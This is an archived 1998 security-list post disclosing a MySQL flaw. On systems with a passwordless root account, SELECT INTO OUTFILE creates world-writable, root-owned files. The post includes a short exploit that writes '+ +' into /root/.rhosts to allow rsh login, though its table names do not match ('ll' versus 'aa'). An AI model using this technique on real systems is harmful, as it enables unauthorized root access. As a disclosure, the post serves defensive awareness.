MySQL Security

From: Sandu Mihai (mikeat_private)
Date: Sun Mar 29 1998 - 00:16:22 PST

  • Next message: Aleph One: "Re: MySQL Security"

    When you use a certain mysql configuration it is possible to create
    files on the system as root with rw-rw-rw.
    Many MySQL users have included user root from localhost without password
    in their config.
    So. If on such a system you issue :
    mysql -u root test
    you not only will have access to the database but you'll be able to
    create a file on the system with the root
    ownership and rw-rw-rw useing the SELECT .. INTO OUTFILE  statement.
     The file you wish to create must NOT EXIST. Otherwise  mysql will give
    you a "file already exists" error.
     To be more precise. MySQL will create the file specified as OUTFILE
    with rw-rw-rw and with the current
    user as owner.
     The exploit is as follows:
              mysql -u root test
            CREATE TABLE ll ( a CHAR(10) );
            INSERT INTO aa (a) VALUES ("+ +");
            SELECT * FROM aa INTO OUTFILE "/root/.rhosts";
    The above exploit works for sites with rexec,rsh enabled (ssh is too
    smart and won't let you in
    if you have .rhosts 666, the same for authorized_keys)
     Well . I've tryied to be tricky by setting umask to 077 in the hope
    that I can trick MySQL in
    makeing the file 600 , childish try, I know but... who knows ?
     If someone could fool MySQL into makeing the file 600 then this is
    quite a serious threat..
    All my best,
                    Sandu Mihai
    p.s. The above works for Mysql Ver 6.5 Distrib 3.20.29 as reported by
    mysql -V  Have phun.. :)

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